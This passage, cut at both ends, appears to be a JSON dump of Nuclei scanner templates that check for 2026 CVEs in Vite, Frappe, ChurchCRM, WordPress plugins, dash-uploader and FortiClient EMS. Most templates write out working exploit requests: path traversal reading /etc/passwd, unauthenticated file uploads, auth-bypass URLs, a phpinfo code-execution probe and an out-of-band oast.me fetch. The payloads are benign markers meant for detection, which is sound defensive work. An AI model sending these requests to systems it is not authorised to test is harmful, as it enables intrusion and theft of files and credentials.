\"\\\"file\\\":\\\"/\"\n\n      - type: word\n        part: header\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - \"\\\"file\\\":\\\"([^\\\"]+)\\\"\"\n# digest: 4a0a00473045022100cacfd6884c346dad3b3c99341895f7a0fc69b29f99e7974efce1c0623ac55a6f02205af148383e38fa3d673b9630196657db9929cacf0b5e3c560bf33785e83173f6:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-39365.yaml","vuln_id":"cve-2026-39365"},{"raw":"id: CVE-2026-39364\n\ninfo:\n  name: Vite Dev Server - Directory Traversal\n  author: ritikchaddha\n  severity: high\n  description: |\n    Vite is a modern frontend build tool. In Vite prior to versions 6.4.3, 6.3.4, and 5.4.23, a directory traversal vulnerability affects the Vite development server. When the Vite dev server is launched with the --host or server.host option, an unauthenticated attacker can craft a request with a path containing dot segments (e.g., /.vite/../<filename>) to bypass static file restrictions and access arbitrary files on the filesystem under the project root. The vulnerability allows access to files normally denied by Vite’s \"server.fs.deny\" setting, including sensitive files like .env, configuration files, or credentials in the project root. This issue has been fixed in versions 6.4.3, 6.3.4, and 5.4.23.\n  impact: |\n    Attackers can retrieve sensitive files like .env or certificates, leading to information disclosure.\n  remediation: |\n    Update to versions 7.3.2 or 8.0.5 or later.\n  reference:\n    - https://github.com/vitejs/vite/security/advisories/GHSA-cw47-99h4-q43f\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-39364\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-39364\n    cwe-id: CWE-22\n    epss-score: 0.01996\n    epss-percentile: 0.79811\n  metadata:\n    max-request: 2\n    fofa-query: body=\"/@vite/client\"\n    shodan-query: http.html:\"/@vite/client\"\n  tags: cve,cve2025,vite,exposure,bypass,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/.env\"\n\n    matchers:\n      - type: status\n        status:\n          - 403\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/.env?raw??\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"export default\", \"data:application/json;base64\")'\n          - 'contains_any(content_type, \"text/javascript\", \"application/javascript\")'\n          - '!contains(tolower(body), \"<html\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 490a0046304402207ccc7f006af1870674418176024a3f8e93bbf70b5a104b8d455d51f331c08f9002204ac25a061c6831f6ae132dcd2f23a1aacbfa0ee3d752e04e59da94951f500896:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-39364.yaml","vuln_id":"cve-2026-39364"},{"raw":"id: CVE-2026-39352\n\ninfo:\n  name: Frappe Framework < 16.15.0 - Arbitrary File Read via render_include Path Traversal\n  author: DhiyaneshDK\n  severity: medium\n  description: |\n    Frappe is a full-stack web application framework. Versions prior to 15.105.0 and 16.15.0 contain a possible Arbitrary File Read vulnerability via Path Traversal. The issue is resolved in versions 16.15.0, 15.105.0 and above.\n  impact: |\n    Attackers can read arbitrary files, potentially exposing sensitive information.\n  remediation: Update to version 15.105.0, 16.15.0 or later.\n  reference:\n    - https://github.com/frappe/frappe/security/advisories/GHSA-67rf-pxgh-vfqv\n    - https://github.com/frappe/frappe/commit/b5ab941788f6232b4f9313432ea7bfb61389fbfd\n    - https://github.com/frappe/frappe/pull/38215\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-39352\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 6.5\n    cve-id: CVE-2026-39352\n    epss-score: 0.01279\n    epss-percentile: 0.68713\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 4\n    vendor: frappe\n    product: frappe\n    shodan-query: http.title:\"Login\" http.html:\"frappe\"\n    fofa-query: title=\"Login\" && body=\"frappe\"\n  tags: cve,cve2026,frappe,lfi,authenticated,file-read\n\nflow: http(1) && http(2) && http(3) && http(4)\n\nvariables:\n  username: \"{{username}}\"\n  password: \"{{password}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /api/method/login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        usr={{username}}&pwd={{password}}\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Logged In\"\n        internal: true\n\n  - raw:\n      - |\n        POST /api/resource/Report HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"doctype\":\"Report\",\"report_name\":\"nuclei_cve2026_39352_{{randstr}}\",\"report_type\":\"Script Report\",\"ref_doctype\":\"User\",\"is_standard\":\"No\",\"disabled\":0,\"javascript\":\"{% include 'frappe/../../../../../../../../../../etc/passwd' %}\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"nuclei_cve2026_39352\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /api/method/frappe.desk.query_report.get_script?report_name=nuclei_cve2026_39352_{{randstr}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - regex('root:.*:0:0:', body)\n          - contains(content_type, \"application/json\")\n          - status_code == 200\n        condition: and\n\n  - raw:\n      - |\n        DELETE /api/resource/Report/nuclei_cve2026_39352_{{randstr}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains_all(body, \"data\",\"ok\")\n          - contains(content_type, \"application/json\")\n          - status_code == 202\n        condition: and\n        internal: true\n# digest: 490a00463044022011b0f0c657453f91806f7e792713ad4c467ac3ac03475f84aeee9aa686d685f7022015e25b25389b9f080d8aaa521ba7549c9ff15abd67cf96289b77353d11aece59:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-39352.yaml","vuln_id":"cve-2026-39352"},{"raw":"id: CVE-2026-39339\n\ninfo:\n  name: ChurchCRM - API Authentication Bypass via URL Injection\n  author: akhilshekhar\n  severity: critical\n  description: |\n    ChurchCRM < 7.1.0 contains an authentication bypass caused by improper API middleware URL handling in ChurchCRM/Slim/Middleware/AuthMiddleware.php, letting unauthenticated attackers access protected API endpoints, exploit requires crafted request URL with 'api/public\n  impact: |\n    Unauthenticated attackers can access all protected API endpoints, exposing sensitive church member data and system information.\n  remediation: |\n    Update to version 7.1.0 or later.\n  reference:\n    - https://github.com/ChurchCRM/CRM/security/advisories/GHSA-v3p2-mx78-pxhc\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 9.1\n    cve-id: CVE-2026-39339\n    epss-score: 0.01351\n    epss-percentile: 0.70305\n    cwe-id: CWE-284\n    cpe: cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*\n  metadata:\n    vendor: churchcrm\n    product: churchcrm\n    shodan-query: http.title:\"churchcrm\"\n    fofa-query: app=\"churchcrm\"\n  tags: cve,cve2026,churchcrm,auth-bypass\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/persons/latest?bypass=/api/public\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"PersonId\"\n          - \"FormattedName\"\n          - \"\\\"people\\\"\"\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100c552ca4dc85223d680af1f7c5a00cf04f4f5c3f295f3edc8216b8a7bb784a3b3022100f710462185d310135daa365d0ec378546b877e9a500850b0acef367cfd601476:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-39339.yaml","vuln_id":"cve-2026-39339"},{"raw":"id: CVE-2026-3891\n\ninfo:\n  name: Pix for WooCommerce <= 1.5.0 - Unauthenticated Arbitrary File Upload\n  author: m4sh_wacker\n  severity: critical\n  description: |\n    The Pix for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing capability check and missing file type validation in the 'lkn_pix_for_woocommerce_c6_save_settings' function in all versions up to, and including, 1.5.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n  impact: |\n    Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise.\n  remediation: |\n    Update to the latest version of Pix for WooCommerce plugin.\n  reference:\n    - https://github.com/m4sh-wacker/CVE-2026-3891-Pix-for-WooCommerce-Plugin-Exploit\n    - https://wordpress.org/plugins/payment-gateway-pix-for-woocommerce/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-3891\n    epss-score: 0.2506\n    epss-percentile: 0.97824\n    cwe-id: CWE-434\n    cpe: cpe:2.3:a:linknacional:payment_gateway_pix_for_woocommerce:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: linknacional\n    product: payment_gateway_pix_for_woocommerce\n    framework: wordpress\n    shodan-query: http.html:\"/wp-content/plugins/payment-gateway-pix-for-woocommerce\"\n    fofa-query: body=\"/wp-content/plugins/payment-gateway-pix-for-woocommerce\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,woocommerce,file-upload,unauth,intrusive,rce\n\nflow: http(1) && http(2) && http(3)\n\nvariables:\n  marker: \"{{randstr}}\"\n  fname: \"{{rand_base(8)}}\"\n  boundary_id: \"{{rand_int(100000, 999999)}}\"\n\nhttp:\n  - id: step-1\n    method: POST\n    path:\n      - \"{{BaseURL}}/wp-admin/admin-ajax.php\"\n    headers:\n      Content-Type: application/x-www-form-urlencoded\n    body: \"action=lkn_pix_for_woocommerce_generate_nonce&action_name=lkn_pix_for_woocommerce_c6_settings_nonce\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, '\\\"success\\\":true')\"\n        condition: and\n        internal: true\n\n    extractors:\n      - type: json\n        name: nonce\n        internal: true\n        json:\n          - \".data.nonce\"\n\n  - id: step-2\n    raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{boundary_id}}\n\n        ------WebKitFormBoundary{{boundary_id}}\n        Content-Disposition: form-data; name=\"action\"\n\n        lkn_pix_for_woocommerce_c6_save_settings\n        ------WebKitFormBoundary{{boundary_id}}\n        Content-Disposition: form-data; name=\"_ajax_nonce\"\n\n        {{nonce}}\n        ------WebKitFormBoundary{{boundary_id}}\n        Content-Disposition: form-data; name=\"certificate_crt_path\"; filename=\"{{fname}}.crt\"\n        Content-Type: application/x-x509-ca-cert\n\n        {{marker}}\n        ------WebKitFormBoundary{{boundary_id}}--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, 'Settings saved successfully')\"\n        condition: and\n        internal: true\n\n  - id: step-3\n    method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/{{fname}}.crt\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"{{marker}}\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022011e42e1a2cf0b3dae4ebd17da4544b3feb4d25a0b7be0af4ca0d71ba3d5e5057022078114bac78e7d89097adf2f68580e54aceb181a06cdb81f4866b68469c28b69d:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-3891.yaml","vuln_id":"cve-2026-3891"},{"raw":"id: CVE-2026-3844\n\ninfo:\n  name: Breeze <= 2.4.4 - Arbitrary File Upload\n  author: theamanrawat,ritikchaddha\n  severity: critical\n  description: |\n    Breeze Cache WordPress plugin <= 2.4.4 contains an unrestricted file upload vulnerability caused by missing file type validation in 'fetch_gravatar_from_remote' function, letting unauthenticated attackers upload arbitrary files, exploit requires 'Host Files Locally - Gravatars' enabled.\n  impact: |\n    Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise.\n  remediation: |\n    Update to the latest version where this vulnerability is fixed.\n  reference:\n    - https://patchstack.com/database/vulnerability/wordpress-breeze-cache-plugin-2-4-4-unauthenticated-arbitrary-file-upload-via-fetch-gravatar-from-remote-vulnerability\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-3844\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-3844\n    epss-score: 0.27701\n    epss-percentile: 0.97999\n    cwe-id: CWE-434\n  metadata:\n    max-request: 4\n    verified: true\n    shodan-query: http.html:\"/wp-content/plugins/breeze/\"\n    fofa-query: body=\"/wp-content/plugins/breeze/\"\n  tags: cve,cve2026,wordpress,wp-plugin,wp,breeze,file-upload,rce,vkev\n\nvariables:\n  marker: \"{{randstr}}\"\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        POST /wp-comments-post.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        comment_post_ID=1&author=x+srcset%3Dhttp%3A%2F%2Foast.me%2F{{marker}}.php&email=breeze{{marker}}%40test.com&comment=breeze+vuln+test+{{marker}}&submit=Post+Comment\n\n    extractors:\n      - type: regex\n        name: redirect_path\n        part: header_1\n        group: 1\n        regex:\n          - 'Location: https?://[^/]+(/.+)'\n        internal: true\n\n  - raw:\n      - |\n        GET {{redirect_path}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"text/html\")'\n          - 'contains(body, \"srcset=https://oast.me\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /wp-content/cache/breeze-extra/gravatars/{{marker}}.php HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"<html><head></head><body></body></html>\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a00473045022100c09b331f604a7d972ce78865a3401b90d3b901495340ec47f22b67201061c6ee02204716e1e076808dceafcce611a6885f8104acfd15f214c5a3c6cfcef58c2d5f71:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-3844.yaml","vuln_id":"cve-2026-3844"},{"raw":"id: CVE-2026-38361\n\ninfo:\n  name: dash-uploader 0.1.0 - 0.7.0a2 - Denial-of-Service via flowTotalChunks\n  author: a1ohadance\n  severity: high\n  description: |\n   fohrloop dash-uploader v0.1.0 through v0.7.0a2 contains a remote code execution caused by improper handling in Upload function and max_file_size parameter in dash_uploader components, letting remote attackers execute arbitrary code, exploit requires crafted request.\n  impact: |\n   Remote attackers can execute arbitrary code, potentially leading to full system compromise.\n  remediation: |\n   Update to the latest version beyond v0.7.0a2.\n  reference:\n    - https://github.com/a1ohadance/CVE-2026-38361\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-38361\n    - https://github.com/advisories/GHSA-xp7f-v245-w3w8\n    - https://github.com/fohrloop/dash-uploader/issues/153\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n    cvss-score: 7.5\n    cve-id: CVE-2026-38361\n    epss-score: 0.02643\n    epss-percentile: 0.84929\n    cwe-id: CWE-400\n  metadata:\n    verified: false\n    max-request: 1\n    vendor: fohrloop\n    product: dash-uploader\n    shodan-query: html:\"_dash-undo-redo\"\n    fofa-query: body=\"_dash-undo-redo\"\n  tags: cve,cve2026,dash-uploader,unauth,python,passive\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"dash_uploader\")'\n        condition: and\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - 'dash_uploader\\.v([0-9._a-z-]+?)m[0-9]+\\.min\\.js'\n# digest: 4a0a00473045022100e0f3ca422c0c5e1c04a770605bc5a8cc715e6abdfed21a77e27b7b574e0c6c9502207500e49e5f6874bcd32ffda99e0b6e259e82627ff207597ae8bbecbf5089a6f5:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-38361.yaml","vuln_id":"cve-2026-38361"},{"raw":"id: CVE-2026-38360\n\ninfo:\n  name: dash-uploader 0.1.0 - 0.7.0a2 - Unauthenticated Arbitrary File Write via Path Traversal\n  author: a1ohadance\n  severity: critical\n  description: |\n   fohrloop dash-uploader v0.1.0 through v0.7.0a2 contains a directory traversal vulnerability caused by improper handling in dash_uploader/httprequesthandler.py components, letting remote attackers execute arbitrary code, exploit requires no special privileges.\n  impact: |\n   Remote attackers can execute arbitrary code, potentially leading to full system compromise.\n  remediation: |\n   Update to the latest version beyond v0.7.0a2.\n  reference:\n    - https://github.com/a1ohadance/CVE-2026-38360\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-38360\n    - https://github.com/advisories/GHSA-3rf6-x59v-5jfv\n    - https://github.com/fohrloop/dash-uploader/issues/153\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-38360\n    epss-score: 0.05982\n    epss-percentile: 0.92976\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 4\n    vendor: fohrloop\n    product: dash-uploader\n    shodan-query: html:\"_dash-undo-redo\"\n    fofa-query: body=\"_dash-undo-redo\"\n  tags: cve,cve2026,dash-uploader,path-traversal,file-write,unauth,python\n\nvariables:\n  marker: \"{{rand_base(16)}}\"\n  filename: \"nuclei_{{rand_base(8)}}.txt\"\n  boundary: \"----nuclei{{rand_base(16)}}\"\n\nflow: (http(1) && http(2)) || (http(3) && http(4))\n\nhttp:\n  - raw:\n      - |\n        POST /API/dash-uploader HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary={{boundary}}\n\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"flowChunkNumber\"\n\n        1\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"flowChunkSize\"\n\n        1048576\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"flowCurrentChunkSize\"\n\n        16\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"flowTotalSize\"\n\n        16\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"flowIdentifier\"\n\n        nuclei-{{rand_base(8)}}\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"flowFilename\"\n\n        {{filename}}\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"flowRelativePath\"\n\n        {{filename}}\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"flowTotalChunks\"\n\n        1\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"upload_id\"\n\n        ../assets\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"file\"; filename=\"{{filename}}\"\n        Content-Type: application/octet-stream\n\n        {{marker}}\n        --{{boundary}}--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, filename)'\n        internal: true\n        condition: and\n\n  - raw:\n      - |\n        GET /assets/{{filename}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, marker)'\n        condition: and\n\n  - raw:\n      - |\n        POST /API/resumable HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary={{boundary}}\n\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"resumableChunkNumber\"\n\n        1\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"resumableChunkSize\"\n\n        1048576\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"resumableCurrentChunkSize\"\n\n        16\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"resumableTotalSize\"\n\n        16\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"resumableIdentifier\"\n\n        nuclei-{{rand_base(8)}}\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"resumableFilename\"\n\n        {{filename}}\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"resumableRelativePath\"\n\n        {{filename}}\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"resumableTotalChunks\"\n\n        1\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"upload_id\"\n\n        ../assets\n        --{{boundary}}\n        Content-Disposition: form-data; name=\"file\"; filename=\"{{filename}}\"\n        Content-Type: application/octet-stream\n\n        {{marker}}\n        --{{boundary}}--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, filename)'\n        internal: true\n        condition: and\n\n  - raw:\n      - |\n        GET /assets/{{filename}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, marker)'\n        condition: and\n# digest: 490a00463044022055e39187e665c9e46eed75b4dbb6face111cdca5254994be91e6909ab33acec302206adf0a2419f4bc42616a2dbc4949448740cf1c96ef9178b7a27b97d4fe88b4a3:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-38360.yaml","vuln_id":"cve-2026-38360"},{"raw":"id: CVE-2026-3584\n\ninfo:\n  name: WordPress Kali Forms <= 2.4.9 - Remote Code Execution\n  author: pussycat0x\n  severity: critical\n  description: |\n    Kali Forms WordPress plugin <= 2.4.9 contains a remote code execution caused by unsafe user input handling in 'form_process' and 'prepare_post_data' functions, letting unauthenticated attackers execute code on the server, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can execute arbitrary code on the server, potentially leading to full system compromise.\n  remediation: |\n    Update to the latest version beyond 2.4.9.\n  reference:\n    - https://wordpress.org/plugins/kali-forms/\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms/kali-forms-249-unauthenticated-remote-code-execution-via-form-process\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-3584\n    epss-score: 0.07239\n    epss-percentile: 0.9405\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 6\n    product: kali-forms\n    framework: wordpress\n    fofa-query: body=\"kali-forms\"\n    shodan-query: http.component:\"WordPress\" http.html:\"kali-forms\"\n  tags: cve,cve2026,wordpress,wp-plugin,kali-forms,rce,unauth,vkev\n\nflow: |\n  var paths = [\"/contact-us/\", \"/contact/\", \"/form/\", \"/feedback/\", \"/\"];\n  for (var i = 0; i < paths.length; i++) {\n    set(\"form_path\", paths[i]);\n    if (http(1)) {\n      http(2);\n      break;\n    }\n  }\n\nhttp:\n  - raw:\n      - |\n        GET {{form_path}} HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"KaliFormsObject\")'\n          - 'contains(body, \"ajax_nonce\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: nonce\n        part: body\n        group: 1\n        regex:\n          - 'ajax_nonce\":\"([a-f0-9]+)\"'\n        internal: true\n\n      - type: regex\n        name: form_id\n        part: body\n        group: 1\n        regex:\n          - 'data-form-id=\"(\\d+)\"'\n        internal: true\n\n      - type: regex\n        name: version\n        part: body\n        group: 1\n        regex:\n          - 'kali-forms/[^\"]*(?:js|css)\\?ver=([0-9.]+)'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=kaliforms_form_process&data[nonce]={{nonce}}&data[formId]={{form_id}}&data[first-name]=test&data[last-name]=user&data[email]=test%40example.com&data[message]=test&data[thisPermalink]=phpinfo\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"phpinfo()</title>\"\n          - \"PHP Extension\"\n          - \"PHP Version\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        name: php_version\n        part: body\n        group: 1\n        regex:\n          - 'PHP Version ([0-9.]+)'\n# digest: 4a0a00473045022005066b611ccae79e248c08ae63828977a7ad01616fd75bca5070f11afc900b25022100aea1cf828542bf8ece4a11fcd7e2d5c0b9b307f4bb6a6ca06df16ddc630618db:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-3584.yaml","vuln_id":"cve-2026-3584"},{"raw":"id: CVE-2026-3576\n\ninfo:\n  name: Planyo Online Reservation System <= 3.0 - Arbitrary File Read\n  author: aryu-ru\n  severity: high\n  description: |\n    The Planyo Online Reservation System plugin for WordPress through 3.0 ships ulap.php, an AJAX proxy that is directly reachable without WordPress bootstrapping or authentication. The send_http_post() function validates the host of the supplied URL against an allowlist that includes localhost, but never validates the URL scheme, so a file://localhost/ URL passes the host check and is handed to curl_init() or fopen(). Both support the file:// wrapper, so the contents of arbitrary local files are returned in the response.\n  impact: |\n    An unauthenticated attacker can read any file readable by the web server, including wp-config.php, which discloses database credentials and WordPress authentication keys.\n  remediation: |\n    Update the Planyo Online Reservation System plugin to version 3.1 or later, which rejects any URL scheme other than http and https.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/5038d12a-e119-4ab7-aadc-69b765ae7027?source=cve\n    - https://www.exploit-db.com/exploits/52636\n    - https://plugins.trac.wordpress.org/browser/planyo-online-reservation-system/trunk/ulap.php#L59\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-3576\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n    cvss-score: 7.2\n    cve-id: CVE-2026-3576\n    epss-score: 0.12943\n    epss-percentile: 0.96137\n    cwe-id: CWE-20\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: xtreeme\n    product: planyo-online-reservation-system\n    framework: wordpress\n    fofa-query: body=\"/plugins/planyo-online-reservation-system/\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,planyo-online-reservation-system,lfi,ssrf\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/planyo-online-reservation-system/readme.txt\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"Planyo online reservation system\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/planyo-online-reservation-system/ulap.php?ulap_url=file://localhost/etc/passwd\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(content_type, \"text/plain\")'\n          - 'regex(\"root:[x*]?:0:0:\", body)'\n          - 'status_code == 200'\n        condition: and\n# digest: 490a0046304402207353babccdfd8f8314862aba468050663aed0688a9465110d511a4747019229e02206f13a4d0cd856ccf33e1eb39886d88b59bab4f6a19a8809848542529ac5b4229:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-3576.yaml","vuln_id":"cve-2026-3576"},{"raw":"id: CVE-2026-35616\n\ninfo:\n  name: FortiClient EMS - Authentication Bypass\n  author: ritikchaddha\n  severity: high\n  description: |\n    Detects whether Fortinet hotfix FG-IR-26-099 for CVE-2026-35616 is missing by comparing behavioral responses from a certificate-authenticated endpoint. The template sends X-SSL-CLIENT-VERIFY: SUCCESS without certificate material and checks whether this spoofed header changes server behavior.\n  impact: |\n    If spoofing X-SSL-CLIENT-VERIFY changes backend behavior, Apache is likely not stripping the header before Django, indicating the target is still vulnerable.\n  remediation: |\n    Apply Fortinet hotfix FG-IR-26-099 or upgrade to FortiClient EMS 7.4.7+.\n  reference:\n    - https://bishopfox.com/blog/api-authentication-bypass-in-forticlient-ems-7-4-5-7-4-6-cve-2026-35616\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-35616\n  classification:\n    cve-id: CVE-2026-35616\n    epss-score: 0.90749\n    epss-percentile: 0.99799\n    cwe-id: CWE-284\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: fortinet\n    product: forticlient_ems\n    shodan-query: http.favicon.hash:-800551065\n  tags: cve,cve2026,fortinet,forticlient,ems,auth-bypass,kev,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /api/v1/fabric_device_auth/fortigate/init HTTP/1.1\n        Host: {{Hostname}}\n        Content-Length: 0\n\n        f\n\n      - |\n        POST /api/v1/fabric_device_auth/fortigate/init HTTP/1.1\n        Host: {{Hostname}}\n        Content-Length: 0\n        X-SSL-CLIENT-VERIFY: SUCCESS\n\n        f\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains(tolower(body_1), 'certificate not found')\"\n          - \"status_code_1 == 401 && status_code_2 == 500\"\n          - \"(body_1 != body_2)\"\n        condition: and\n# digest: 4a0a00473045022100a4a5f95600bd214589db80ce39a4d2b3e5800a566a1490d5aff62afab75e15aa02200668b8dce8f7c0918e097208c51f17a8ae702bd4e8d7d690696d270b760f6407:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-35616.yaml","vuln_id":"cve-2026-35616"},{"raw":"id: CVE-2026-35273\n\ninfo:\n  name: Oracle PeopleSoft PeopleTools PSEMHUB - Pre-Auth Java Deserialization RCE\n  author: 